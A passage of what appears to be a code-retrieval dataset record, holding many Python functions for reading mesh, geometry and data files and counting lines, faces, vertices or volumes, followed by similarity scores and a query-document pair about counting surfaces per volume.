dtype=int)\n FileName = self.GetMeshFileName()\n try:\n if v[0] >= 1 and v[1] >= 10:\n # max_rows in numpy versions >= 1.10\n msh = np.genfromtxt(FileName, delimiter='\\n', dtype=np.str,comments='!', max_rows=1)\n else:\n # This reads whole file :(\n msh = np.genfromtxt(FileName, delimiter='\\n', dtype=np.str, comments='!')[0]\n except (IOError, OSError) as fe:\n raise _helpers.PVGeoError(str(fe))\n # Fist line is the size of the model\n self.__sizeM = np.array(msh.ravel()[0].split(), dtype=int)\n # Check if the mesh is a UBC 2D mesh\n if self.__sizeM.shape[0] == 1:\n # Read in data from file\n xpts, xdisc, zpts, zdisc = ubcMeshReaderBase._ubcMesh2D_part(FileName)\n nx = np.sum(np.array(xdisc,dtype=int))+1\n nz = np.sum(np.array(zdisc,dtype=int))+1\n return (0,nx, 0,1, 0,nz)\n # Check if the mesh is a UBC 3D mesh or OcTree\n elif self.__sizeM.shape[0] >= 3:\n # Get mesh dimensions\n dim = self.__sizeM[0:3]\n ne,nn,nz = dim[0], dim[1], dim[2]\n return (0,ne, 0,nn, 0,nz)\n else:\n raise _helpers.PVGeoError('File format not recognized')", "def get_num_chunks(self) -> int:", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def calc_face_dimensions(face):\n vertical = filter_vertical_edges(face.edges, face.normal).pop()\n horizontal = filter_horizontal_edges(face.edges, face.normal).pop()\n return horizontal.calc_length(), vertical.calc_length()", "def _count_data(path):\n matcher = re.compile(r'[0-9]+\\.dec')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def ReadFenics(self, filename, element_type):\n\n if element_type == \"tet\":\n etype = \"tetrahedron\"\n elif element_type == \"hex\":\n etype = \"hexahedron\"\n elif element_type == \"tri\":\n etype = \"triangle\"\n elif element_type == \"quad\":\n etype = \"quadrilateral\"\n\n import xml.etree.cElementTree as ET\n root = ET.parse(filename).getroot()\n X = []\n T = []\n for child in root:\n if child.attrib['celltype'] != etype:\n raise ValueError(\"xml file does not contain {} elements\".format(element_type))\n\n for child in root:\n for cchild in child:\n if cchild.tag == \"vertices\":\n if element_type == \"tet\" or element_type == \"hex\":\n for child3 in cchild:\n x = float(child3.attrib['x'])\n y = float(child3.attrib['y'])\n z = float(child3.attrib['z'])\n X.append([x,y,z])\n elif element_type == \"tri\" or element_type == \"quad\":\n for child3 in cchild:\n x = float(child3.attrib['x'])\n y = float(child3.attrib['y'])\n X.append([x,y])\n\n elif cchild.tag == \"cells\":\n if element_type == \"tet\":\n for child3 in cchild:\n v0 = int(child3.attrib['v0'])\n v1 = int(child3.attrib['v1'])\n v2 = int(child3.attrib['v2'])\n v3 = int(child3.attrib['v3'])\n T.append([v0,v1,v2,v3])\n elif element_type == \"tri\":\n for child3 in cchild:\n v0 = int(child3.attrib['v0'])\n v1 = int(child3.attrib['v1'])\n v2 = int(child3.attrib['v2'])\n T.append([v0,v1,v2])\n\n\n X = np.array(X)\n T = np.array(T,dtype=np.int64)\n\n self.elements = T\n self.points = X\n self.element_type = element_type\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n\n if self.points.shape[1] == 3:\n if np.allclose(self.points[:,2],0.):\n self.points = np.ascontiguousarray(self.points[:,:2])\n\n ndim = self.InferSpatialDimension()\n if self.element_type == \"tri\" or self.element_type == \"quad\":\n self.GetEdges()\n self.GetBoundaryEdges()\n elif self.element_type == \"tet\" or self.element_type == \"hex\":\n self.GetFaces()\n self.GetBoundaryFaces()\n self.GetBoundaryEdges()", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n QUAD_MAGIC = 16777215\n NEW_QUAD_MAGIC = 16777213\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n if magic in (QUAD_MAGIC, NEW_QUAD_MAGIC): # Quad file\n nvert = _fread3(fobj)\n nquad = _fread3(fobj)\n (fmt, div) = (\">i2\", 100.) if magic == QUAD_MAGIC else (\">f4\", 1.)\n coords = np.fromfile(fobj, fmt, nvert * 3).astype(np.float) / div\n coords = coords.reshape(-1, 3)\n quads = _fread3_many(fobj, nquad * 4)\n quads = quads.reshape(nquad, 4)\n #\n # Face splitting follows\n #\n faces = np.zeros((2 * nquad, 3), dtype=np.int)\n nface = 0\n for quad in quads:\n if (quad[0] % 2) == 0:\n faces[nface] = quad[0], quad[1], quad[3]\n nface += 1\n faces[nface] = quad[2], quad[3], quad[1]\n nface += 1\n else:\n faces[nface] = quad[0], quad[1], quad[2]\n nface += 1\n faces[nface] = quad[0], quad[2], quad[3]\n nface += 1\n\n elif magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def readCubeFile(self, filename):\n\n inputfile = open(filename, \"r\")\n header = \"\".join([inputfile.readline(), inputfile.readline()])\n\n temp = inputfile.readline().strip().split()\n self.numAtoms = int(temp[0])\n self.origin = list(map(float, temp[1:]))\n\n self.numPoints = [0] * 3\n self.spacing = [0] * 3\n for i in range(3):\n line = inputfile.readline().strip().split()\n self.numPoints[i] = int(line[0])\n temp = list(map(float, line[1:]))\n self.spacing[i] = temp[i]\n assert sum(temp[:i] + temp[i + 1:]) == 0\n\n # Read in the lines with atom data\n for i in range(self.numAtoms):\n line = inputfile.readline()\n\n self.data = np.zeros((self.numPoints[1], self.numPoints[0], self.numPoints[2]), \"float\")\n i = j = k = 0\n while i < self.numPoints[1]:\n line = next(inputfile)\n temp = list(map(float, line.strip().split()))\n for x in range(0, len(temp)):\n self.data[j, i, x + k] = temp[x]\n\n k += len(temp)\n if k == self.numPoints[2]:\n j += 1\n k = 0\n if j == self.numPoints[1]:\n i += 1\n j = 0\n\n inputfile.close()", "def parseInputFile(fn):\n\twith open(fn) as f:\n\t\tpoly = [float(x) for x in f.readline().strip().split()]\n\t\titers = int(f.readline().strip())\n\t\treturn (poly, iters)", "def load_faces(file_data, headers, indices):\n\n\n def swap_winding(indices):\n return (indices[0], indices[2], indices[1])\n \n\n def indices_from_face(face_data):\n base_vertex = face_data[3]\n base_index = face_data[5]\n index_count = face_data[6]\n\n faces_indices = [base_vertex + indices[base_index + current_index] \n for current_index in range(index_count)]\n\n #Split into lists of 3 - ie triangles\n faces = []\n for current_face_idx in range(0, len(faces_indices), 3):\n faces.append(faces_indices[current_face_idx:current_face_idx+3])\n\n return faces\n\n\n def face_from_pack(face_data):\n \"\"\" \n Extract just the data we want from the full chunk\n \"\"\"\n triangle_list = indices_from_face(face_data)\n return [(face_data[0], triangles,) for triangles in triangle_list]\n\n face_offset, face_length = headers[13]\n face_chunk = Struct(\"iiiiiiii2i2i3f3f3f3f2i\") \n face_size = face_chunk.size\n face_count = int(face_length / face_size)\n\n faces = []\n\n for current_face_idx in range(face_count):\n face_file_position = face_offset + current_face_idx * face_size\n current_face = face_chunk.unpack(file_data[face_file_position : face_file_position+face_size])\n\n #Check we are a valid face (Could use a filter later)\n if current_face[2] != 1: continue #Only support meshes at the moment\n\n new_faces = face_from_pack(current_face)\n faces.extend(new_faces)\n\n return faces", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def extract_triangles(mesh, materials_list):\n tri_list = []\n do_uv = bool(mesh.tessface_uv_textures)\n\n for mat in materials_list:\n for i, face in enumerate(mesh.tessfaces):\n f_v = face.vertices\n if mesh.materials[face.material_index].name != mat: continue\n\n uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None\n\n fmt = 0\n if(do_uv): fmt = face.material_index\n\n if do_uv:\n f_uv = uf.uv\n\n if len(f_v) == 3:\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n else: new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n tri_list.append(new_tri)\n\n else: # it's a quad\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), fmt)\n\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])\n else:\n new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n new_tri_2.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n\n tri_list.append(new_tri)\n tri_list.append(new_tri_2)\n\n return tri_list", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def get_n(self):\n return np.append([self.n_init],[s.n for s in self.surfaces])", "def inithr(_filename):\n # Open file provided\n _file = open(_filename)\n # Create empty array to hold data\n _data = np.zeros((1, 3), dtype=float)\n\n # Iterate through the file line by line\n for _line in _file:\n # Split each line into constituent values\n _x = _line.split()\n # Append data array with each value, converted to float, convert parallax angle to distance\n _data = np.append(_data, np.array([float(_x[1]), float(_x[2]), (1 / float(_x[3]))], ndmin=2), axis=0)\n\n # Iterate through data array\n for _row in _data:\n np.seterr(divide='ignore')\n # Convert magnitude to luminosity\n _row[0] = _row[0] - 5 * (np.log10(_row[2]) - 1)\n # Convert B-V colour to temperature\n _row[1] = 4600 * ((1 / (0.92 * _row[1] + 1.7)) + 1 / (0.92 * _row[1] + 0.62))\n\n # Delete first empty row\n _data = np.delete(_data, 0, axis=0)\n\n # Return parsed data\n return _data", "def read_file(file):\n if opts.input_type == 'fits':\n data = fileio.read_fits(file)\n else:\n data = fileio.read_ascii(file)\n c_id = data[0,:]\n g_num = np.array(range(len(c_id)), dtype = 'int')\n g_id = data[3,:]\n g_ra = np.array(data[4,:], dtype = 'float')\n g_dec = np.array(data[5,:], dtype = 'float')\n g_z = np.array(data[6,:], dtype = 'float')\n return c_id, g_num, g_id, g_ra, g_dec, g_z", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def part2(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums_no_red(data)", "def compute_surface_area(self):\n return np.sum(self._find_triangle_areas())", "def part_1() -> int:\n initial_input = _load_input()\n rows = len(initial_input)\n cols = len(initial_input[0])\n\n input = initial_input.copy()\n total_glow_count = 0\n\n for _ in range(100):\n flashed = list()\n for row in range(rows):\n for col in range(cols):\n coords = [[col, row]]\n new_input, glow_count = _get_glow_counts(coords, input, flashed)\n input = new_input\n total_glow_count += glow_count\n\n return total_glow_count", "def get_data(data_file_path):\n data_file = open(data_file_path, 'r').readlines()\n data = []\n n = -1\n dim = -1\n for i in range(len(data_file)):\n line_elems = [float(x) for x in data_file[i].split()]\n if i == 0:\n n = int(line_elems[0])\n dim = int(line_elems[1])\n else:\n data.append(np.array(line_elems))\n return data, n, dim", "def get_faces_nr(self):\r\n\r\n logger.debug('Getting number of faces in each frame')\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n\r\n if os.path.exists(self.track_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n\r\n return\r\n\r\n self.faces_nr = {}\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n frame_list = segment_dict[c.FRAMES_KEY]\r\n\r\n for frame_dict in frame_list:\r\n\r\n frame_name = frame_dict[c.SAVED_FRAME_NAME_KEY]\r\n\r\n if frame_name in self.faces_nr:\r\n\r\n self.faces_nr[frame_name] += 1\r\n\r\n else:\r\n\r\n self.faces_nr[frame_name] = 1\r\n\r\n # Save YAML file\r\n\r\n utils.save_YAML_file(self.faces_nr_path, self.faces_nr)", "def readprimitive(f): \n \n ## read in lines from input file and ignore blank lines and comment lines\n lines = [line.rstrip() for line in f if line.rstrip() if line[0] != '#']\n\n # a1,a2,a3\n A = np.array([[float(lines[0].split()[0]),float(lines[0].split()[1]),float(lines[0].split()[2])],\n [float(lines[1].split()[0]),float(lines[1].split()[1]),float(lines[1].split()[2])],\n [float(lines[2].split()[0]),float(lines[2].split()[1]),float(lines[2].split()[2])]]).T\n \n # number of basis atoms\n num_basis = int(lines[3].split()[0]) \n\n # basis atom positions in unit cell\n unitcell_pos = []\n for i in range(num_basis): \n unitcell_pos.append([float(lines[4+i].split()[0]),float(lines[4+i].split()[1]),float(lines[4+i].split()[2])]) \n \n return (A,unitcell_pos)", "def part1(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums(data)", "def obtener_cantidad_vertices(self):\n return len(self.vertices.keys())", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', '')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def load_verts(file_data, headers, scale_factor):\n\n\n def vert_from_pack(vert_data):\n return (\n (vert_data[0] * scale_factor, vert_data[1] * scale_factor, vert_data[2] * scale_factor,), #XYZ\n (vert_data[3], vert_data[4],), #UV1\n (vert_data[5], vert_data[6],), #UV2\n (vert_data[7], vert_data[8], vert_data[9],), #Normal\n (vert_data[10], vert_data[11], vert_data[12], vert_data[13],), #RGBA\n )\n\n vert_offset, vert_length = headers[10]\n vert_chunk = Struct(\"3f2f2f3f4B\") \n vert_size = vert_chunk.size\n vert_count = int(vert_length / vert_size)\n\n print (\"Found {} vertices\".format(vert_count))\n\n vertices = []\n\n for current_vert_idx in range(vert_count):\n vert_file_position = vert_offset + current_vert_idx * vert_size\n current_vert = vert_chunk.unpack(file_data[vert_file_position : vert_file_position+vert_size])\n vertices.append(vert_from_pack(current_vert))\n\n return vertices", "def get_number_of_letters(self):\n filename = f'{self.path}/{self.filename}'\n file = open(filename, 'r', encoding='utf-8')\n \"\"\"Count number of lettes without digits, non letter characters, without xml tags\"\"\"\n data = file.read()\n data = re.sub('<.*?binary.*?>*<.*?binary.*?>',' ', data)\n data = re.sub('\\\\s\\\\s*', '', (re.sub('\\\\W|\\\\d', ' ', re.sub('<.*?>', '', data))))\n let_count = len(data)\n sqlite_for_ht.CreateTable.update_table(f_1, self.filename, 'number_of_letters', let_count)\n print(datetime.now(), '-', 'number_of_letters for', self.filename, 'calculated =', let_count)\n return None" ]
[ "0.78216827", "0.65307426", "0.64875203", "0.6224915", "0.6100354", "0.60187995", "0.59512895", "0.5924314", "0.59203315", "0.5906817", "0.59059787", "0.5882943", "0.5867339", "0.585497", "0.58549577", "0.5812365", "0.57997227", "0.57795846", "0.57746047", "0.57551175", "0.5748937", "0.5748146", "0.5725021", "0.5702728", "0.5698386", "0.5691206", "0.56838804", "0.56726533", "0.5660846", "0.5656267", "0.5645008", "0.56413954", "0.56186074", "0.56131804", "0.5612977", "0.5591385", "0.55882674", "0.5583263", "0.55814636", "0.55635816", "0.55606204", "0.55409354", "0.5535321", "0.55073744", "0.55027145", "0.5488749", "0.5487895", "0.54793304", "0.54753", "0.5460062", "0.54573315", "0.54482156", "0.54470176", "0.54455364", "0.5443752", "0.5437656", "0.5428198", "0.5427783", "0.541538", "0.54097253", "0.5398149", "0.53920686", "0.5391353", "0.5389164", "0.5385579", "0.53842545", "0.5364776", "0.5356398", "0.5355718", "0.53523314", "0.5346526", "0.53442633", "0.53398955", "0.5333428", "0.5324331", "0.5324294", "0.53221965", "0.5320378", "0.5317432", "0.5317432", "0.5317432", "0.5317432", "0.5309065", "0.5297589", "0.529438", "0.52812845", "0.5279945", "0.5278592", "0.5276384", "0.52760696", "0.527073", "0.52688897", "0.526617", "0.5262776", "0.52577895", "0.52572966", "0.52495706", "0.5245097", "0.52390534", "0.5237486" ]
0.6084134
5
Get the number of surfaces that each volume in a given file contains inputs
def get_surfaces_per_volume(my_core, entityset_ranges): s_p_v = {} for volumeset in entityset_ranges['Volumes']: s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size() return s_p_v
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def test_number_of_surface_objects(self):\n for O in self.mod.objts.itervalues():\n no_of_surfaces = 0\n for C in O.conts.itervalues():\n if C.surf != 0:\n no_of_surfaces += 1\n self.assertEqual(O.surfsize, no_of_surfaces)", "def count_timepoints(sc, session, files):\n tuples = zip(range(len(files)), files)\n files_sc = sc.parallelize(tuples)\n\n def count_planes(kv):\n index, path2 = kv\n try:\n from ScanImageTiffReader import ScanImageTiffReader\n img = ScanImageTiffReader(path2).data()\n except Exception:\n import tifffile\n img = tifffile.imread(path2)\n return img.shape[0]\n\n data2 = files_sc.map(count_planes).collect()\n frame_numbers = np.array(data2)\n vol_numbers = frame_numbers / len(session.fieldMask)\n return vol_numbers.astype(int)", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def count(self, volume):\n\n countResult = 0\n\n for x in range(volume.shape[0]):\n for y in range(volume.shape[1]):\n for z in range(volume.shape[2]):\n if self.isMember(volume[x,y,z]):\n countResult += 1\n\n return countResult", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def compute_volume(bundle):\n\taff=np.array([[-1.25, 0, 0, 90],[0, 1.25, 0, -126],[0, 0, 1.25, -72],[0, 0, 0, 1]])\n\tvoxel_list = streamline_mapping(bundle, affine=aff).keys()\n\tvol_bundle = len(set(voxel_list))\n\n\treturn vol_bundle", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def _count_data(path):\n matcher = re.compile(r'[0-9]+\\.dec')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def fileCount(self):\n pass", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def numberFiles(self):\n with open(self.inputfile) as fin:\n for n, _ in enumerate(fin, start=1): pass\n self.n = n\n return self.n", "def num_instances_mgf(infile_name):\n\tinfile = open(infile_name)\n\tnum_instances = 0\n\tfor line in infile:\n\t\tif line.startswith(\"BEGIN IONS\"):\n\t\t\tnum_instances += 1\n\treturn(num_instances)", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def get_n(self):\n return np.append([self.n_init],[s.n for s in self.surfaces])", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', '')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def getFileCount(self) -> int:\n ...", "def n_subfile(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=False):\n n += 1\n return n", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def get_amount_of_file_type_volumes(host_ip, sp_id, sd_id, image_id):\n # Build the path to the Disk's location on the file system\n volume_path = FILE_SD_VOLUME_PATH_IN_FS % (sp_id, sd_id, image_id)\n command = GET_FILE_SD_NUM_DISK_VOLUMES % volume_path\n executor = rhevm_helpers.get_host_executor(\n ip=host_ip, password=config.VDC_ROOT_PASSWORD\n )\n rc, output, err = executor.run_cmd(shlex.split(command))\n\n assert not rc, errors.CommandExecutionError(\"Output: %s\" % output)\n # There are a total of 3 files/volume, the volume metadata (.meta),\n # the volume lease (.lease) and the volume content itself (no\n # extension)\n num_volumes = int(output)/3\n logger.debug(\n \"The number of file type volumes found is '%s'\",num_volumes\n )\n return num_volumes", "def get_box_volume(solvent_file):\n box_volume = None\n file = solvent_file\n with open(file,\"rt\") as fin:\n for line in fin:\n if line[0:6] == \"CRYST1\":\n x_length = float(line[9:14])\n y_length = float(line[18:23])\n z_length = float(line[27:33])\n box_volume = x_length * y_length * z_length\n return(box_volume)\n return(box_volume)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def get_n_polymers(filename):\r\n \r\n dmpcis_name = re.sub('dmpci', 'dmpcis', filename)\r\n\r\n with open(dmpcis_name, 'rt') as f:\r\n for line in f:\r\n if line.startswith(' # of type 1'):\r\n n_polymers = int(line.strip().split()[-1])\r\n\r\n return n_polymers", "def count_variants(filename, content=None):\n open_fn = gzip.open if is_gz_file(filename) else open\n count = 0\n with open_fn(filename, \"rt\") as ifile:\n for line in ifile:\n if not line.startswith(\"#\"):\n if content:\n if content in line:\n count += 1\n else:\n count += 1\n return count", "def fileCounter(directory):", "def Number_elements(file1,file2):\n start = time.time()\n\n verified_element = np.intersect1d(np.array(file1), np.array(file2)) \n\n print(len(verified_element))\n print(f'Duration: {time.time() - start} seconds')", "def parse_file_count(path, args):\n try:\n fisier = open(path, 'r')\n except IOError:\n print(\"Nu am putut deschide fisierul :\", path)\n return\n n_found = 0\n pattern = args.pattern\n for line in fisier:\n if args.ignore_case:\n line = line.lower()\n pattern = pattern.lower()\n n_found += line.count(pattern)\n\n fisier.close()\n return n_found", "def num_instances_msp(infile_name):\n\tinfile = open(infile_name)\n\tnum_instances = 0\n\tfor line in infile:\n\t\tif line.startswith(\"Name: \"):\n\t\t\tnum_instances += 1\n\treturn(num_instances)", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def numberFiles(self):\n return self.n", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def get_num_instances_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n file_frames = float(shape[0])\n if self.mode_last_patch == 'discard':\n # the last patch that is always incomplete is discarded\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n elif self.mode_last_patch == 'fill':\n # the last patch that is always incomplete will be filled with zeros or signal, to avoid discarding signal\n # hence we count one more patch\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, 1 + int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n return num_instances_per_file", "def get_num_instances_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n file_frames = float(shape[0])\n if self.mode_last_patch == 'discard':\n # the last patch that is always incomplete is discarded\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n elif self.mode_last_patch == 'fill':\n # the last patch that is always incomplete will be filled with zeros or signal, to avoid discarding signal\n # hence we count one more patch\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, 1 + int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n return num_instances_per_file", "def vacabulary_size():\r\n file_read = read_file()\r\n vacabulary_list = []\r\n for key in file_read:\r\n for element in file_read[key]:\r\n if element not in vacabulary_list:\r\n 